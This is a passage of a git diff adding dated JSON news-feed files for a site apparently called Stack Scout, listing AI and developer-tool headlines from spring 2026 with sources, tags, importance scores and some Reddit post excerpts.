"summary": null, + "category": "ai_research" + }, + { + "title": "UT Austin and ServiceNow Research Team Releases AU-Harness: An Open-Source Toolkit for Holistic Evaluation of Audio LLMs", + "url": "https://www.marktechpost.com/2025/09/14/ut-austin-and-servicenow-research-team-releases-au-harness-an-open-source-toolkit-for-holistic-evaluation-of-audio-llms/", + "source": "MarkTechPost", + "tags": [ + "product_launch", + "open_source" + ], + "matching_tags": [ + "product_launch", + "open_source" + ], + "importance": 1, + "date": "2026-04-01T09:35:03.737Z", + "summary": null, + "category": "ai_research" + }, + { + "title": "Google AI Releases Veo 3.1 Lite: Giving Developers Low Cost High Speed Video Generation via The Gemini API", + "url": "https://www.marktechpost.com/2026/03/31/google-ai-releases-veo-3-1-lite-giving-developers-low-cost-high-speed-video-generation-via-the-gemini-api/", + "source": "MarkTechPost", + "tags": [ + "api_update", + "product_launch" + ], + "matching_tags": [ + "api_update", + "product_launch" + ], + "importance": 1, + "date": "2026-04-01T09:35:03.724Z", + "summary": null, + "category": "ai_research" + }, + { + "title": "Improve coding agents’ performance with Gemini API Docs MCP and Agent Skills.", + "url": "https://blog.google/innovation-and-ai/technology/developers-tools/gemini-api-docsmcp-agent-skills/", + "source": "Google AI Blog", + "tags": [ + "api_update", + "mcp" + ], + "matching_tags": [ + "api_update", + "mcp" + ], + "importance": 1, + "date": "2026-04-01T09:34:55.903Z", + "summary": null, + "category": "ai_models" + }, + { + "title": "AnnouncementsFeb 5, 2026Introducing Claude Opus 4.6We’re upgrading our smartest model. Across agentic coding, computer use, tool use, search, and finance, Opus 4.6 is an industry-leading model, often by wide margin.", + "url": "https://www.anthropic.com/news/claude-opus-4-6", + "source": "Anthropic News", + "tags": [ + "api_update", + "agent_tool" + ], + "matching_tags": [ + "api_update", + "agent_tool" + ], + "importance": 1, + "date": "2026-04-01T09:34:54.348Z", + "summary": null, + "category": "ai_models" + }, + { + "title": "Show HN: CLI to order groceries via reverse-engineered REWE API (Haskell)", + "url": "https://github.com/yannick-cw/korb", + "source": "Hacker News", + "tags": [ + "api_update", + "cli_tool" + ], + "matching_tags": [ + "api_update", + "cli_tool" + ], + "importance": 0.74, + "date": "2026-03-30T06:45:58.000Z", + "summary": null, + "category": "tech_general" + }, + { + "title": "Stability AI Announces Investment from WPP and New Partnership to Shape the Future of Media and Entertainment Production", + "url": "https://stability.ai/news-updates/stability-ai-announces-investment-from-wpp-and-new-partnership-to-shape-the-future-of-media-and-entertainment-production", + "source": "Stability AI Blog", + "tags": [ + "product_launch" + ], + "matching_tags": [ + "product_launch" + ], + "importance": 1, + "date": "2026-04-01T09:35:11.176Z", + "summary": null, + "category": "creative_tools" + }, + { + "title": "NVIDIA Releases New AI Models and Developer Tools to Advance Autonomous Vehicle Ecosystem", + "url": "https://blogs.nvidia.com/blog/autonomous-vehicle-ecosystem-ai-models-developer-tools/", + "source": "NVIDIA AI Blog", + "tags": [ + "product_launch" + ], + "matching_tags": [ + "product_launch" + ], + "importance": 1, + "date": "2026-04-01T09:35:05.180Z", + "summary": null, + "category": "ai_tools" + }, + { + "title": "An Implementation of IWE’s Context Bridge as an AI-Powered Knowledge Graph with Agentic RAG, OpenAI Function Calling, and Graph Traversal", + "url": "https://www.marktechpost.com/2026/03/27/an-implementation-of-iwes-context-bridge-as-an-ai-powered-knowledge-graph-with-agentic-rag-openai-function-calling-and-graph-traversal/", + "source": "MarkTechPost", + "tags": [ + "api_update" + ], + "matching_tags": [ + "api_update" + ], + "importance": 1, + "date": "2026-04-01T09:35:03.747Z", + "summary": null, + "category": "ai_research" + }, + { + "title": "How to Design a Fully Functional Enterprise AI Assistant with Retrieval Augmentation and Policy Guardrails Using Open Source AI Models", + "url": "https://www.marktechpost.com/2025/10/22/how-to-design-a-fully-functional-enterprise-ai-assistant-with-retrieval-augmentation-and-policy-guardrails-using-open-source-ai-models/", + "source": "MarkTechPost", + "tags": [ + "open_source" + ], + "matching_tags": [ + "open_source" + ], + "importance": 1, + "date": "2026-04-01T09:35:03.735Z", + "summary": null, + "category": "ai_research" + }, + { + "title": "Salesforce AI Research Releases VoiceAgentRAG: A Dual-Agent Memory Router that Cuts Voice RAG Retrieval Latency by 316x", + "url": "https://www.marktechpost.com/2026/03/30/salesforce-ai-research-releases-voiceagentrag-a-dual-agent-memory-router-that-cuts-voice-rag-retrieval-latency-by-316x/", + "source": "MarkTechPost", + "tags": [ + "product_launch" + ], + "matching_tags": [ + "product_launch" + ], + "importance": 1, + "date": "2026-04-01T09:35:03.718Z", + "summary": null, + "category": "ai_research" + }, + { + "title": "Hugging Face Releases TRL v1.0: A Unified Post-Training Stack for SFT, Reward Modeling, DPO, and GRPO Workflows", + "url": "https://www.marktechpost.com/2026/04/01/hugging-face-releases-trl-v1-0-a-unified-post-training-stack-for-sft-reward-modeling-dpo-and-grpo-workflows/", + "source": "MarkTechPost", + "tags": [ + "product_launch" + ], + "matching_tags": [ + "product_launch" + ], + "importance": 1, + "date": "2026-04-01T09:35:03.710Z", + "summary": null, + "category": "ai_research" + }, + { + "title": "Salesforce announces an AI-heavy makeover for Slack, with 30 new features", + "url": "https://techcrunch.com/2026/03/31/salesforce-announces-an-ai-heavy-makeover-for-slack-with-30-new-features/", + "source": "TechCrunch AI", + "tags": [ + "product_launch" + ], + "matching_tags": [ + "product_launch" + ], + "importance": 1, + "date": "2026-04-01T09:34:58.227Z", + "summary": null, + "category": "ai_tools" + }, + { + "title": "How I contributed a new model to the Transformers library using Codex 1 day ago • 34", + "url": "https://huggingface.co/blog/nielsr/contributing-to-transformers-with-codex", + "source": "Hugging Face Blog", + "tags": [ + "developer_tool" + ], + "matching_tags": [ + "developer_tool" + ], + "importance": 1, + "date": "2026-04-01T09:34:55.910Z", + "summary": null, + "category": "ai_models" + } + ] +} \ No newline at end of file diff --git a/data/news-feed-2026-04-02.json b/data/news-feed-2026-04-02.json new file mode 100644 index 0000000..d7ef7ba --- /dev/null +++ b/data/news-feed-2026-04-02.json @@ -0,0 +1,181 @@ +{ + "generated": "2026-06-05T00:44:32.037Z", + "generatedBy": "Studio news backfill", + "site": "Stack Scout", + "date": "2026-04-02", + "article_count": 11, + "archived_story_count": 120, + "articles": [ + { + "title": "Google releases Gemma 4 under Apache 2.0 — and that license change may matter more than benchmarks", + "url": "https://venturebeat.com/technology/google-releases-gemma-4-under-apache-2-0-and-that-license-change-may-matter", + "source": "VentureBeat AI", + "tags": [ + "product_launch", + "open_source" + ], + "matching_tags": [ + "product_launch", + "open_source" + ], + "importance": 1, + "date": "2026-04-02T18:00:23.348Z", + "summary": null, + "category": "ai_tools" + }, + { + "title": "Cursor Launches a New AI Agent Experience to Take On Claude Code and Codex", + "url": "https://www.wired.com/story/cusor-launches-coding-agent-openai-anthropic/", + "source": "Wired AI", + "tags": [ + "product_launch", + "agent_tool" + ], + "matching_tags": [ + "product_launch", + "agent_tool" + ], + "importance": 1, + "date": "2026-04-02T18:00:15.314Z", + "summary": null, + "category": "ai_tools" + }, + { + "title": "Google announces Gemma 4 open AI models, switches to Apache 2.0 license", + "url": "https://arstechnica.com/ai/2026/04/google-announces-gemma-4-open-ai-models-switches-to-apache-2-0-license/", + "source": "Ars Technica AI", + "tags": [ + "product_launch", + "open_source" + ], + "matching_tags": [ + "product_launch", + "open_source" + ], + "importance": 0.98, + "date": "2026-04-02T18:00:16.217Z", + "summary": null, + "category": "tech_general" + }, + { + "title": "Z.ai Launches GLM-5V-Turbo: A Native Multimodal Vision Coding Model Optimized for OpenClaw and High-Capacity Agentic Engineering Workflows Everywhere", + "url": "https://www.marktechpost.com/2026/04/01/z-ai-launches-glm-5v-turbo-a-native-multimodal-vision-coding-model-optimized-for-openclaw-and-high-capacity-agentic-engineering-workflows-everywhere/", + "source": "MarkTechPost", + "tags": [ + "product_launch" + ], + "matching_tags": [ + "product_launch" + ], + "importance": 1, + "date": "2026-04-02T06:00:27.059Z", + "summary": null, + "category": "ai_research" + }, + { + "title": "IBM Announces Strategic Collaboration with Arm", + "url": "https://newsroom.ibm.com/2026-04-02-ibm-announces-strategic-collaboration-with-arm-to-shape-the-future-of-enterprise-computing", + "source": "Hacker News", + "tags": [ + "product_launch" + ], + "matching_tags": [ + "product_launch" + ], + "importance": 0.98, + "date": "2026-04-02T08:48:44.000Z", + "summary": null, + "category": "tech_general" + }, + { + "title": "IBM Releases Granite 4.0 3B Vision: A New Vision Language Model for Enterprise Grade Document Data Extraction", + "url": "https://www.marktechpost.com/2026/04/01/ibm-releases-granite-4-0-3b-vision-a-new-vision-language-model-for-enterprise-grade-document-data-extraction/", + "source": "MarkTechPost", + "tags": [ + "product_launch" + ], + "matching_tags": [ + "product_launch" + ], + "importance": 0.9, + "date": "2026-04-02T18:00:19.625Z", + "summary": null, + "category": "ai_research" + }, + { + "title": "Google releases Gemma 4 open models", + "url": "https://deepmind.google/models/gemma/gemma-4/", + "source": "Hacker News", + "tags": [ + "product_launch" + ], + "matching_tags": [ + "product_launch" + ], + "importance": 0.9, + "date": "2026-04-02T16:10:54.000Z", + "summary": null, + "category": "tech_general" + }, + { + "title": "Lemonade by AMD: a fast and open source local LLM server using GPU and NPU", + "url": "https://lemonade-server.ai", + "source": "Hacker News", + "tags": [ + "open_source" + ], + "matching_tags": [ + "open_source" + ], + "importance": 0.8200000000000001, + "date": "2026-04-02T11:04:51.000Z", + "summary": null, + "category": "tech_general" + }, + { + "title": "Artemis II, NASA's boldest mission in generations, launches crew to the Moon", + "url": "https://arstechnica.com/space/2026/04/four-astronauts-depart-for-the-moon-with-a-fiery-send-off-from-cape-canaveral/", + "source": "Ars Technica AI", + "tags": [ + "product_launch" + ], + "matching_tags": [ + "product_launch" + ], + "importance": 0.6599999999999999, + "date": "2026-04-02T18:00:16.230Z", + "summary": null, + "category": "tech_general" + }, + { + "title": "Delve allegedly forked an open-source tool and sold it as its own", + "url": "https://techcrunch.com/2026/04/01/the-reputation-of-troubled-yc-startup-delve-has-gotten-even-worse/", + "source": "Hacker News", + "tags": [ + "open_source" + ], + "matching_tags": [ + "open_source" + ], + "importance": 0.6599999999999999, + "date": "2026-04-02T15:03:08.000Z", + "summary": null, + "category": "tech_general" + }, + { + "title": "Python API usage", + "url": "https://github.com/datasette/datasette-llm/blob/0.1a6/README.md#usage", + "source": "Simon Willison's Blog", + "tags": [ + "api_update" + ], + "matching_tags": [ + "api_update" + ], + "importance": 0.6599999999999999, + "date": "2026-04-02T06:00:31.526Z", + "summary": null, + "category": "ai_tools" + } + ] +} \ No newline at end of file diff --git a/data/news-feed-2026-04-03.json b/data/news-feed-2026-04-03.json new file mode 100644 index 0000000..2773b50 --- /dev/null +++ b/data/news-feed-2026-04-03.json @@ -0,0 +1,119 @@ +{ + "generated": "2026-06-05T00:44:32.201Z", + "generatedBy": "Studio news backfill", + "site": "Stack Scout", + "date": "2026-04-03", + "article_count": 7, + "archived_story_count": 351, + "articles": [ + { + "title": "Arcee AI Releases Trinity Large Thinking: An Apache 2.0 Open Reasoning Model for Long-Horizon Agents and Tool Use", + "url": "https://www.marktechpost.com/2026/04/02/arcee-ai-releases-trinity-large-thinking-an-apache-2-0-open-reasoning-model-for-long-horizon-agents-and-tool-use/", + "source": "MarkTechPost", + "tags": [ + "api_update", + "product_launch", + "open_source" + ], + "matching_tags": [ + "api_update", + "product_launch", + "open_source" + ], + "importance": 1, + "date": "2026-04-03T06:00:57.447Z", + "summary": null, + "category": "ai_research" + }, + { + "title": "TII Releases Falcon Perception: A 0.6B-Parameter Early-Fusion Transformer for Open-Vocabulary Grounding and Segmentation from Natural Language Prompts", + "url": "https://www.marktechpost.com/2026/04/03/tii-releases-falcon-perception-a-0-6b-parameter-early-fusion-transformer-for-open-vocabulary-grounding-and-segmentation-from-natural-language-prompts/", + "source": "MarkTechPost", + "tags": [ + "product_launch" + ], + "matching_tags": [ + "product_launch" + ], + "importance": 1, + "date": "2026-04-03T14:05:05.318Z", + "summary": null, + "category": "ai_research" + }, + { + "title": "New ways to balance cost and reliability in the Gemini API", + "url": "https://blog.google/innovation-and-ai/technology/developers-tools/introducing-flex-and-priority-inference/", + "source": "Google AI Blog", + "tags": [ + "api_update" + ], + "matching_tags": [ + "api_update" + ], + "importance": 0.94, + "date": "2026-04-03T06:00:46.321Z", + "summary": null, + "category": "ai_models" + }, + { + "title": "C89cc.sh – standalone C89/ELF64 compiler in pure portable shell", + "url": "https://gist.github.com/alganet/2b89c4368f8d23d033961d8a3deb5c19", + "source": "Hacker News", + "tags": [ + "cli_tool" + ], + "matching_tags": [ + "cli_tool" + ], + "importance": 0.74, + "date": "2026-04-01T08:41:49.000Z", + "summary": null, + "category": "tech_general" + }, + { + "title": "Your Agent Has 12 Blind Spots You Can't See Yet. This Audit Prompt Finds Them. (+ Skill Package)", + "url": "https://natesnewsletter.substack.com/p/your-agent-has-12-blind-spots-you", + "source": "Nate's Newsletter", + "tags": [ + "developer_tool" + ], + "matching_tags": [ + "developer_tool" + ], + "importance": 0.6799999999999999, + "date": "2026-04-03T14:05:06.150Z", + "summary": null, + "category": "ai_tools" + }, + { + "title": "Google Vids extension", + "url": "https://chromewebstore.google.com/detail/google-vids-screen-record/iklnnbgdcppplombffihcijanngoeifm", + "source": "The Verge AI", + "tags": [ + "developer_tool" + ], + "matching_tags": [ + "developer_tool" + ], + "importance": 0.6799999999999999, + "date": "2026-04-03T06:01:01.783Z", + "summary": null, + "category": "ai_tools" + }, + { + "title": "Post Mortem: axios NPM supply chain compromise", + "url": "https://github.com/axios/axios/issues/10636", + "source": "Simon Willison's Blog", + "tags": [ + "cli_tool" + ], + "matching_tags": [ + "cli_tool" + ], + "importance": 0.6799999999999999, + "date": "2026-04-03T00:00:19.000Z", + "summary": null, + "category": "ai_tools" + } + ] +} \ No newline at end of file diff --git a/data/news-feed-2026-04-04.json b/data/news-feed-2026-04-04.json new file mode 100644 index 0000000..cd76d7c --- /dev/null +++ b/data/news-feed-2026-04-04.json @@ -0,0 +1,87 @@ +{ + "generated": "2026-06-05T00:44:32.356Z", + "generatedBy": "Studio news backfill", + "site": "Stack Scout", + "date": "2026-04-04", + "article_count": 5, + "archived_story_count": 236, + "articles": [ + { + "title": "@CloudflareDev — Gemma 4 Just Landed on Cloudflare Workers AI — 256K Context, Tool Calling, Vision", + "url": "https://x.com/CloudflareDev/status/2040459229039940068", + "source": "Aligned News (Scoble)", + "tags": [ + "api_update", + "product_launch" + ], + "matching_tags": [ + "api_update", + "product_launch" + ], + "importance": 1, + "date": "2026-04-04T16:20:03.318Z", + "summary": "@CloudflareDev announces Gemma 4 is now on Workers AI — MoE model with 26B total and 4B active parameters, 256K context window, tool calling, reasoning, and vision capabilities.", + "category": "ai_tools" + }, + { + "title": "YC-Bench: Can Your AI Agent Run a Startup Without Going Bankrupt? 2 days ago • 3", + "url": "https://huggingface.co/blog/collinear-ai/yc-bench", + "source": "Hugging Face Blog", + "tags": [ + "agent_tool" + ], + "matching_tags": [ + "agent_tool" + ], + "importance": 1, + "date": "2026-04-04T18:00:25.574Z", + "summary": null, + "category": "ai_models" + }, + { + "title": "@synthwavedd — GPT Image 2 Stealth Launched — Significant Quality Upgrade for All ChatGPT Users", + "url": "https://x.com/synthwavedd/status/2040442540508287101", + "source": "Aligned News (Scoble)", + "tags": [ + "tool_update" + ], + "matching_tags": [ + "tool_update" + ], + "importance": 1, + "date": "2026-04-04T16:20:03.318Z", + "summary": "@synthwavedd reports GPT Image 2 has been stealth launched on ChatGPT — all image generations now routing to the new model. A significant quality upgrade with no announcement.", + "category": "ai_tools" + }, + { + "title": "Components of A Coding Agent", + "url": "https://magazine.sebastianraschka.com/p/components-of-a-coding-agent", + "source": "Sebastian Raschka", + "tags": [ + "agent_tool" + ], + "matching_tags": [ + "agent_tool" + ], + "importance": 0.8600000000000001, + "date": "2026-04-04T18:00:27.636Z", + "summary": null, + "category": "ai_research" + }, + { + "title": "RAG-Anything: All-in-One RAG Framework", + "url": "https://paperswithcode.com/papers/2510.12323", + "source": "Papers With Code", + "tags": [ + "developer_tool" + ], + "matching_tags": [ + "developer_tool" + ], + "importance": 0.76, + "date": "2026-04-04T06:00:23.350Z", + "summary": null, + "category": "ai_research" + } + ] +} \ No newline at end of file diff --git a/data/news-feed-2026-04-05.json b/data/news-feed-2026-04-05.json new file mode 100644 index 0000000..bd95cd6 --- /dev/null +++ b/data/news-feed-2026-04-05.json @@ -0,0 +1,261 @@ +{ + "generated": "2026-06-05T00:44:32.524Z", + "generatedBy": "Studio news backfill", + "site": "Stack Scout", + "date": "2026-04-05", + "article_count": 15, + "archived_story_count": 210, + "articles": [ + { + "title": "Improved markdown quality, code intelligence for 248 languages, and more in Kreuzberg v4.7.0", + "url": "https://reddit.com/r/LocalLLaMA/comments/1scv46p/improved_markdown_quality_code_intelligence_for/", + "source": "Reddit r/LocalLLaMA", + "tags": [ + "product_launch", + "developer_tool", + "cli_tool", + "tool_update" + ], + "matching_tags": [ + "product_launch", + "developer_tool", + "cli_tool", + "tool_update" + ], + "importance": 1, + "date": "2026-04-05T05:17:04.000Z", + "summary": "Kreuzberg v4.7.0 is here. Kreuzberg is a Rust-core document intelligence library that works with Python, TypeScript/Node.js, Go, Ruby, Java, C#, PHP, Elixir, R, C, and WASM. \n\nWe’ve added several features, integrated OpenWEBUI, and made a big improvement in quality across all formats. There is also a new markdown rendering layer and new HTML output, which we now support. And much more (which you can find in our [the release notes](https://github.com/kreuzberg-dev/kreuzberg/releases)).\n\nThe main ", + "category": "ai_models" + }, + { + "title": "[P] Cadenza: Connect Wandb logs to agents easily for autonomous research.", + "url": "https://reddit.com/r/MachineLearning/comments/1scm9do/p_cadenza_connect_wandb_logs_to_agents_easily_for/", + "source": "Reddit r/MachineLearning", + "tags": [ + "api_update", + "mcp", + "developer_tool", + "cli_tool" + ], + "matching_tags": [ + "api_update", + "mcp", + "developer_tool", + "cli_tool" + ], + "importance": 1, + "date": "2026-04-04T22:09:24.000Z", + "summary": "Wandb CLI and MCP is atrocious to use with agents for full autonomous research loops. They are slow, clunky, and result in context rot.\n\nSo I built a CLI tool and a Python SDK to make it easy to connect your Wandb projects and runs to your agent (clawed or otherwise).\n\n \nThe cli tool works by allowing you to import your wandb projects and structures your runs in a way that makes it easy for agents to get a sense of the solution space of your research project.\n\nWhen projects are imported, only t", + "category": "ai_research" + }, + { + "title": "I built an open-source tool that lets Claude Code and Claude Desktop control Unreal Engine — 60+ operations, zero editor clicks", + "url": "https://reddit.com/r/ClaudeAI/comments/1scvnt8/i_built_an_opensource_tool_that_lets_claude_code/", + "source": "Reddit r/ClaudeAI", + "tags": [ + "mcp", + "open_source", + "developer_tool", + "cli_tool" + ], + "matching_tags": [ + "mcp", + "open_source", + "developer_tool", + "cli_tool" + ], + "importance": 0.9400000000000001, + "date": "2026-04-05T05:47:58.000Z", + "summary": "I wanted Claude to actually *do things* inside Unreal Engine, not just write code and hope it compiles. So I built soft-ue-cli.\n\nIt's a Python tool + a C++ plugin that runs inside UE. Claude sends commands, UE executes them. Two ways to use it:\n\n* **Claude Code** — runs `soft-ue-cli` commands in the terminal\n* **Claude Desktop / Cursor / Windsurf** — connects via MCP (`soft-ue-cli mcp-serve`)\n\nHere's what a typical session looks like. I ask Claude to \"inspect the player Blueprint and add a healt", + "category": "ai_tools" + }, + { + "title": "Running OpenClaw with Gemma 4 TurboQuant on MacAir 16GB", + "url": "https://reddit.com/r/LocalLLaMA/comments/1sciyfg/running_openclaw_with_gemma_4_turboquant_on/", + "source": "Reddit r/LocalLLaMA", + "tags": [ + "api_update", + "open_source" + ], + "matching_tags": [ + "api_update", + "open_source" + ], + "importance": 1, + "date": "2026-04-04T19:54:55.000Z", + "summary": "Hi guys,\n\nWe’ve implemented a one-click app for OpenClaw with Local Models built in. It includes TurboQuant caching, a large context window, and proper tool calling. It runs on mid-range devices. Free and Open source.\n\nThe biggest challenge was enabling a local agentic model to run on average hardware like a Mac Mini or MacBook Air. Small models work well on these devices, but agents require more sophisticated models like QWEN or GLM. OpenClaw adds a large context to each request, which caused t", + "category": "ai_models" + }, + { + "title": "Claude Code via VSCode extension still uses more tokens than Claude Code via terminal", + "url": "https://reddit.com/r/ClaudeAI/comments/1scsl84/claude_code_via_vscode_extension_still_uses_more/", + "source": "Reddit r/ClaudeAI", + "tags": [ + "developer_tool", + "cli_tool" + ], + "matching_tags": [ + "developer_tool", + "cli_tool" + ], + "importance": 0.8600000000000001, + "date": "2026-04-05T03:05:56.000Z", + "summary": "Last night was the first time I maxed out my max plan session limits simply by trying out Claude Code directly in VSCode. Even on low effort, it seems to chew through tokens while essentially being the same as Claude Code via terminal. Other people seem to have had the same experience:\n\nhttps://www.reddit.com/r/ClaudeAI/comments/1o1ccfz/claude_code_via_extension_consumes_more_tokens/\n\nhttps://github.com/anthropics/claude-code/issues/19908\n\nDue to this it makes no sense to use it as you're essent", + "category": "ai_tools" + }, + { + "title": "What are your favorite MCP servers to use with Claude Code?", + "url": "https://reddit.com/r/ClaudeAI/comments/1scw3ll/what_are_your_favorite_mcp_servers_to_use_with/", + "source": "Reddit r/ClaudeAI", + "tags": [ + "api_update", + "mcp" + ], + "matching_tags": [ + "api_update", + "mcp" + ], + "importance": 0.86, + "date": "2026-04-05T06:12:54.000Z", + "summary": "I’ve been using one that strips raw HTML before it hits the context window, saves a ton of tokens on web fetches. Curious what else people are running and whether it’s actually worth it.", + "category": "ai_tools" + }, + { + "title": "I built & publicly host a handful of MCP servers - free to use, no API keys/auth needed", + "url": "https://reddit.com/r/ClaudeAI/comments/1sceak4/i_built_publicly_host_a_handful_of_mcp_servers/", + "source": "Reddit r/ClaudeAI", + "tags": [ + "api_update", + "mcp" + ], + "matching_tags": [ + "api_update", + "mcp" + ], + "importance": 0.86, + "date": "2026-04-04T16:52:56.000Z", + "summary": "Hi there, I wanted to share something I've been working on. I've built a collection of MCP servers that are all hosted and publicly available. You can point any MCP client (like Claude/ChatGPT) at them and start using them immediately - no setup/install, no keys/auth, nothing running locally.\n\nHere's what's live right now:\n\n**Health and science:**\n\n* [https://cdc.caseyjhand.com/mcp](https://cdc.caseyjhand.com/mcp) \\- 1,487+ CDC public health datasets covering disease surveillance, mortality, vac", + "category": "ai_tools" + }, + { + "title": "Basic PSA. PocketPal got updated, so runs Gemma 4.", + "url": "https://reddit.com/r/LocalLLaMA/comments/1scsgid/basic_psa_pocketpal_got_updated_so_runs_gemma_4/", + "source": "Reddit r/LocalLLaMA", + "tags": [ + "tool_update" + ], + "matching_tags": [ + "tool_update" + ], + "importance": 1, + "date": "2026-04-05T02:59:44.000Z", + "summary": "Just because I've seen a couple of \"I want this on Android\" questions, PocketPal got updated a few hours ago, and runs Gemma 4 2B and 4B fine. At least on my hardware (crappy little moto g84 workhorse phone). Love an app that gets regular updates.\n\nI'm going to try and squeak 26B a4 iq2 quantization into 12gigs of ram, on a fresh boot, but I'm almost certain it can't be done due to Android bloat.\n\nBut yeah, 2B and 4B work fine and quickly under PocketPal. Hopefully their next one is 7-8B (not 9B", + "category": "ai_models" + }, + { + "title": "Local Claude Code with Qwen3.5 27B", + "url": "https://reddit.com/r/LocalLLaMA/comments/1scrnzm/local_claude_code_with_qwen35_27b/", + "source": "Reddit r/LocalLLaMA", + "tags": [ + "cli_tool" + ], + "matching_tags": [ + "cli_tool" + ], + "importance": 1, + "date": "2026-04-05T02:19:54.000Z", + "summary": "after long research, finding best alternative for \n[Using a local LLM in OpenCode with llama.cpp](https://aayushgarg.dev/posts/2026-03-29-local-llm-opencode/) \nto use totally local environment for coding tasks \nI found this article [How to connect Claude Code CLI to a local llama.cpp server](https://www.reddit.com/r/LocalLLaMA/comments/1s8l1ef/how_to_connect_claude_code_cli_to_a_local/) \nhow to disable telemetry and make claude code totally offline.\n\nmodel used - Qwen3.5 27B \nQuant used - u", + "category": "ai_models" + }, + { + "title": "Gemma 4 vs Qwen3.5 on SVG style", + "url": "https://reddit.com/r/LocalLLaMA/comments/1scr78z/gemma_4_vs_qwen35_on_svg_style/", + "source": "Reddit r/LocalLLaMA", + "tags": [ + "api_update" + ], + "matching_tags": [ + "api_update" + ], + "importance": 1, + "date": "2026-04-05T01:56:43.000Z", + "summary": "Some quick test using Gemma4-31B and Qwen3.5-27B, both Q4 quants from unsloth.\n\nI was already expecting Gemma 4 to be excellent at creative writing and better at translations for more obscure languages, but I didn’t expected to be that good at function calling and general coding tasks, and even in creating SVGs!\n\nDid you find any areas when Qwen3.5 beats Gemma4 ?", + "category": "ai_models" + }, + { + "title": "[P] MCGrad: fix calibration of your ML model in subgroups", + "url": "https://reddit.com/r/MachineLearning/comments/1scjzer/p_mcgrad_fix_calibration_of_your_ml_model_in/", + "source": "Reddit r/MachineLearning", + "tags": [ + "developer_tool" + ], + "matching_tags": [ + "developer_tool" + ], + "importance": 1, + "date": "2026-04-04T20:36:01.000Z", + "summary": "Hi r/MachineLearning,\n\nWe’re open-sourcing **MCGrad**, a Python package for multicalibration–developed and deployed in production at Meta. This work will also be presented at KDD 2026.\n\n**The Problem:** A model can be globally calibrated yet significantly miscalibrated within identifiable subgroups or feature intersections (e.g., \"users in region X on mobile devices\"). Multicalibration aims to ensure reliability across such subpopulations.\n\n**The Solution:** MCGrad reformulates multicalibration ", + "category": "ai_research" + }, + { + "title": "Matthew Berman Built 'Journey' — Agents Can Now Discover and Install Workflows Easily", + "url": "https://x.com/DoctorYev/status/2040484581581951473", + "source": "Aligned News (Scoble)", + "tags": [ + "tool_update" + ], + "matching_tags": [ + "tool_update" + ], + "importance": 1, + "date": "2026-04-04T20:22:18.777Z", + "summary": "Matthew Berman launched Journey, a tool for agents to discover and install full workflows. Braygent would post about why workflow discovery is the missing piece of the agent ecosystem.", + "category": "ai_tools" + }, + { + "title": "Clement Delangue Is Telling Everyone to Move to Open and Local Models", + "url": "https://x.com/peteskomoroch/status/2040516928461303930", + "source": "Aligned News (Scoble)", + "tags": [ + "open_source" + ], + "matching_tags": [ + "open_source" + ], + "importance": 1, + "date": "2026-04-04T20:22:18.777Z", + "summary": "HuggingFace CEO Clement Delangue publicly urged developers to move to open or local models. Braygent would post about why this moment feels different from previous open source advocacy.", + "category": "ai_tools" + }, + { + "title": "Voting for our open source AI art competition is open for the next 45 hours", + "url": "https://reddit.com/r/StableDiffusion/comments/1scj9bn/voting_for_our_open_source_ai_art_competition_is/", + "source": "Reddit r/StableDiffusion", + "tags": [ + "open_source" + ], + "matching_tags": [ + "open_source" + ], + "importance": 1, + "date": "2026-04-04T20:06:51.000Z", + "summary": "If you would like to be inspired about what open models can do - both technically and artistically - it's probably not a bad way to spend a few hours. Like [here](https://arcagidan.com/). Most of the entries also shared the workflows they used!", + "category": "creative_tools" + }, + { + "title": "We absolutely need Qwen3.6-397B-A17B to be open source", + "url": "https://reddit.com/r/LocalLLaMA/comments/1sccpbj/we_absolutely_need_qwen36397ba17b_to_be_open/", + "source": "Reddit r/LocalLLaMA", + "tags": [ + "open_source" + ], + "matching_tags": [ + "open_source" + ], + "importance": 1, + "date": "2026-04-04T15:50:40.000Z", + "summary": "The benchmarks may not show it but it's a substantial improvement over 3.5 for real world tasks. This model is performing better than GLM-5.1 and Kimi-k2.5 for me, and the biggest area of improvement has been reliability. \n\nIt feels as reliable as claude in getting shit done end to end and not mess up half way and waste hours. This is the first OS model that has actually felt like I can compare it to Claude Sonnet.\n\nWe have been comparing OS models with claude sonnet and opus left and right mont", + "category": "ai_models" + } + ] +} \ No newline at end of file diff --git a/data/news-feed-2026-04-06.json b/data/news-feed-2026-04-06.json new file mode 100644 index 0000000..1663ed7 --- /dev/null +++ b/data/news-feed-2026-04-06.json @@ -0,0 +1,263 @@ +{ + "generated": "2026-06-05T00:44:32.736Z", + "generatedBy": "Studio news backfill", + "site": "Stack Scout", + "date": "2026-04-06", + "article_count": 15, + "archived_story_count": 651, + "articles": [ + { + "title": "RightNow AI Releases AutoKernel: An Open-Source Framework that Applies an Autonomous Agent Loop to GPU Kernel Optimization for Arbitrary PyTorch Models", + "url": "https://www.marktechpost.com/2026/04/06/rightnow-ai-releases-autokernel-an-open-source-framework-that-applies-an-autonomous-agent-loop-to-gpu-kernel-optimization-for-arbitrary-pytorch-models/", + "source": "MarkTechPost", + "tags": [ + "product_launch", + "open_source", + "developer_tool" + ], + "matching_tags": [ + "product_launch", + "open_source", + "developer_tool" + ], + "importance": 1, + "date": "2026-04-06T18:01:49.121Z", + "summary": null, + "category": "ai_research" + }, + { + "title": "[P] Easily provide Wandb logs as context to agents for analysis and planning.", + "url": "https://reddit.com/r/MachineLearning/comments/1se1rmd/p_easily_provide_wandb_logs_as_context_to_agents/", + "source": "Reddit r/MachineLearning", + "tags": [ + "api_update", + "mcp", + "cli_tool" + ], + "matching_tags": [ + "api_update", + "mcp", + "cli_tool" + ], + "importance": 1, + "date": "2026-04-06T15:16:50.000Z", + "summary": "It is frustrating to use the Wandb CLI and MCP tools with my agents. For one, the MCP tool basically floods the context window and frequently errors out :/\n\nSo I built a cli tool that:\n\n* imports my wandb projects;\n* uses algorithms from [AlphaEvolve](https://arxiv.org/abs/2506.13131) to index and structure my runs;\n* is easy to use for agents;\n* provides greater context of past experiments;\n* does not flood the context window; and\n* easily tune exploration-exploitation while planning\n\nWould lov", + "category": "ai_research" + }, + { + "title": "Gemma4:26b's reasoning capabilities are crazy.", + "url": "https://reddit.com/r/LocalLLaMA/comments/1sdz71b/gemma426bs_reasoning_capabilities_are_crazy/", + "source": "Reddit r/LocalLLaMA", + "tags": [ + "api_update", + "developer_tool" + ], + "matching_tags": [ + "api_update", + "developer_tool" + ], + "importance": 1, + "date": "2026-04-06T13:41:08.000Z", + "summary": "Been experimenting with it, first on my buddy's compute he let me borrow, and then with the Gemini SDK so that I don't need to keep stealing his macbook from 600 miles away. Originally my home agent was run through 